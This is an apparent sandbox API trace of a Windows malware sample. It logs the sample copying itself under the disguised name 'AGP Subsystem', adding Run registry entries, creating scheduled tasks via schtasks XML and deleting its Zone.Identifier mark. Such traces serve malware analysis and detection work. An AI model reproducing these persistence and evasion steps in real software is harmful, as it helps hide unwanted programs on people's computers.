[0167.388] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.388] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e798, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.388] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e798, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.389] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"), lpNewFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe"), bFailIfExists=1) returned 1
[0167.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x28ecd8 | out: phkResult=0x28ecd8*=0x258) returned 0x0
[0167.453] RegQueryValueExW (in: hKey=0x258, lpValueName="AGP Subsystem", lpReserved=0x0, lpType=0x28eccc, lpData=0x0, lpcbData=0x28ecc8*=0x0 | out: lpType=0x28eccc*=0x0, lpData=0x0, lpcbData=0x28ecc8*=0x0) returned 0x2
[0167.454] RegSetValueExW (in: hKey=0x258, lpValueName="AGP Subsystem", Reserved=0x0, dwType=0x1, lpData="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", cbData=0x5e | out: lpData="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe") returned 0x0
[0167.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x28ecb8 | out: phkResult=0x28ecb8*=0x254) returned 0x0
[0167.472] RegQueryValueExW (in: hKey=0x254, lpValueName="AGP Subsystem", lpReserved=0x0, lpType=0x28ecd0, lpData=0x0, lpcbData=0x28eccc*=0x0 | out: lpType=0x28ecd0*=0x0, lpData=0x0, lpcbData=0x28eccc*=0x0) returned 0x2
[0167.472] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.479] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x5f
[0167.479] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\AGP Subsystem\\agpss.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\agp subsystem\\agpss.exe")) returned 0
[0167.495] EtwEventRegister () returned 0x0
[0169.203] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0169.204] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0169.255] CoTaskMemAlloc (cb=0x20c) returned 0x7755a0
[0169.255] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7755a0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0169.255] CoTaskMemFree (pv=0x7755a0)
[0169.256] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x28e7ac, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0169.258] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x28e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0169.259] CoTaskMemAlloc (cb=0x20c) returned 0x7755a0
[0169.259] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x7755a0 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp")) returned 0xfd29
[0169.262] CoTaskMemFree (pv=0x7755a0)
[0169.266] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", nBufferLength=0x105, lpBuffer=0x28e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", lpFilePart=0x0) returned 0x31
[0169.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb88) returned 1
[0169.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0169.266] GetFileType (hFile=0x27c) returned 0x1
[0169.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb84) returned 1
[0169.266] GetFileType (hFile=0x27c) returned 0x1
[0169.268] WriteFile (in: hFile=0x27c, lpBuffer=0x28d19bc*, nNumberOfBytesToWrite=0x54e, lpNumberOfBytesWritten=0x28ec14, lpOverlapped=0x0 | out: lpBuffer=0x28d19bc*, lpNumberOfBytesWritten=0x28ec14*=0x54e, lpOverlapped=0x0) returned 1
[0169.270] CloseHandle (hObject=0x27c) returned 1
[0169.292] CoTaskMemAlloc (cb=0x20e) returned 0x7755a0
[0169.292] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7755a0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a
[0169.292] CoTaskMemFree (pv=0x7755a0)
[0169.293] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\Desktop", lpStartupInfo=0x28ea60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28d2ddc | out: lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp\"", lpProcessInformation=0x28d2ddc*(hProcess=0x280, hThread=0x27c, dwProcessId=0x7d0, dwThreadId=0x650)) returned 1
[0169.309] CloseHandle (hObject=0x27c) returned 1
[0169.310] GetCurrentProcess () returned 0xffffffff
[0169.310] GetCurrentProcess () returned 0xffffffff
[0169.311] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ec78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ec78*=0x27c) returned 1
[0169.312] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x2710, cHandles=0x1, pHandles=0x28ec70*=0x27c, lpdwindex=0x28ea94 | out: lpdwindex=0x28ea94) returned 0x0
[0169.967] CloseHandle (hObject=0x27c) returned 1
[0169.970] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x28ecdc | out: lpExitCode=0x28ecdc*=0x0) returned 1
[0169.971] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", lpFilePart=0x0) returned 0x31
[0169.971] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp")) returned 1
[0169.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0170.006] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat", nBufferLength=0x105, lpBuffer=0x28e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat", lpFilePart=0x0) returned 0x50
[0170.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb98) returned 1
[0170.007] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\task.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\task.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0170.007] GetFileType (hFile=0x27c) returned 0x1
[0170.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb94) returned 1
[0170.008] GetFileType (hFile=0x27c) returned 0x1
[0170.008] WriteFile (in: hFile=0x27c, lpBuffer=0x28d4d74*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x28ec24, lpOverlapped=0x0 | out: lpBuffer=0x28d4d74*, lpNumberOfBytesWritten=0x28ec24*=0x5f, lpOverlapped=0x0) returned 1
[0170.010] CloseHandle (hObject=0x27c) returned 1
[0170.011] CoTaskMemAlloc (cb=0x20c) returned 0x780878
[0170.012] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x780878 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0170.012] CoTaskMemFree (pv=0x780878)
[0170.012] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x28e7ac, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0170.012] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x28e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0170.012] CoTaskMemAlloc (cb=0x20c) returned 0x780878
[0170.012] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x780878 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp")) returned 0x17
[0170.013] CoTaskMemFree (pv=0x780878)
[0170.014] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", nBufferLength=0x105, lpBuffer=0x28e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", lpFilePart=0x0) returned 0x2f
[0170.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eb88) returned 1
[0170.014] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c
[0170.014] GetFileType (hFile=0x27c) returned 0x1
[0170.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eb84) returned 1
[0170.014] GetFileType (hFile=0x27c) returned 0x1
[0170.014] WriteFile (in: hFile=0x27c, lpBuffer=0x28d8864*, nNumberOfBytesToWrite=0x51d, lpNumberOfBytesWritten=0x28ec14, lpOverlapped=0x0 | out: lpBuffer=0x28d8864*, lpNumberOfBytesWritten=0x28ec14*=0x51d, lpOverlapped=0x0) returned 1
[0170.016] CloseHandle (hObject=0x27c) returned 1
[0170.018] CoTaskMemAlloc (cb=0x20e) returned 0x780878
[0170.018] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x780878 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a
[0170.018] CoTaskMemFree (pv=0x780878)
[0170.018] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\Desktop", lpStartupInfo=0x28ea58*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28d9b20 | out: lpCommandLine="\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\"", lpProcessInformation=0x28d9b20*(hProcess=0x2b0, hThread=0x27c, dwProcessId=0x5e0, dwThreadId=0x3b8)) returned 1
[0170.026] CloseHandle (hObject=0x27c) returned 1
[0170.026] GetCurrentProcess () returned 0xffffffff
[0170.026] GetCurrentProcess () returned 0xffffffff
[0170.026] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ec78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ec78*=0x27c) returned 1
[0170.027] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x2710, cHandles=0x1, pHandles=0x28ec70*=0x27c, lpdwindex=0x28ea94 | out: lpdwindex=0x28ea94) returned 0x0
[0170.828] CloseHandle (hObject=0x27c) returned 1
[0170.828] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0x28ecdc | out: lpExitCode=0x28ecdc*=0x0) returned 1
[0170.828] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", nBufferLength=0x105, lpBuffer=0x28e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", lpFilePart=0x0) returned 0x2f
[0170.828] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp")) returned 1
[0170.838] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e780, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0170.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifier", cchWideChar=111, lpMultiByteStr=0x28ec74, cbMultiByte=113, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifierq\x93
6", lpUsedDefaultChar=0x0) returned 111
[0170.859] DeleteFileA (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe:zone.identifier")) returned 0
[0171.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat", nBufferLength=0x105, lpBuffer=0x28e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat", lpFilePart=0x0) returned 0x53
[0171.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e8c8) returned 1
[0171.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\catalog.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\catalog.dat"), fInfoLevelId=0x0, lpFileInformation=0x28eb8c | out: lpFileInformation=0x28eb8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e8c4) returned 1
[0171.249] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat", nBufferLength=0x105, lpBuffer=0x28e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat", lpFilePart=0x0) returned 0x53
[0171.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e8b8) returned 1
[0171.249] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\storage.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\storage.dat"), fInfoLevelId=0x0, lpFileInformation=0x28eb7c | out: lpFileInformation=0x28eb7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e8b4) returned 1
[0171.728] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e00, lpName=0x0) returned 0x2dc
[0171.728] memcpy (in: _Dst=0x3e0000, _Src=0x28aa574, _Size=0x4e00 | out: _Dst=0x3e0000) returned 0x3e0000
[0171.729] CloseHandle (hObject=0x2dc) returned 1
[0171.910] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0171.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9c8) returned 1
[0171.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x28ec8c | out: lpFileInformation=0x28ec8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9c4) returned 1
[0171.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", nBufferLength=0x105, lpBuffer=0x28e64c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", lpFilePart=0x0) returned 0x54
[0171.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e88c) returned 1
[0171.914] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bak"), fInfoLevelId=0x0, lpFileInformation=0x28eb50 | out: lpFileInformation=0x28eb50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0171.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e888) returned 1
[0172.255] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18800, lpName=0x0) returned 0x304
[0172.255] memcpy (in: _Dst=0x440000, _Src=0x38a90c8, _Size=0x18800 | out: _Dst=0x440000) returned 0x440000
[0172.257] CloseHandle (hObject=0x304) returned 1
[0172.873] GetUserNameW (in: lpBuffer=0x28e444, pcbBuffer=0x28e6bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x28e6bc) returned 1
[0173.386] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj", nBufferLength=0x105, lpBuffer=0x28e174, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj", lpFilePart=0x0) returned 0x56
[0173.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.386] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
[0173.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Logs\\kEecfMwgj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\logs\\keecfmwgj"), fInfoLevelId=0x0, lpFileInformation=0x28e600 | out: lpFileInformation=0x28e600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e338) returned 1
[0173.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e33c) returned 1
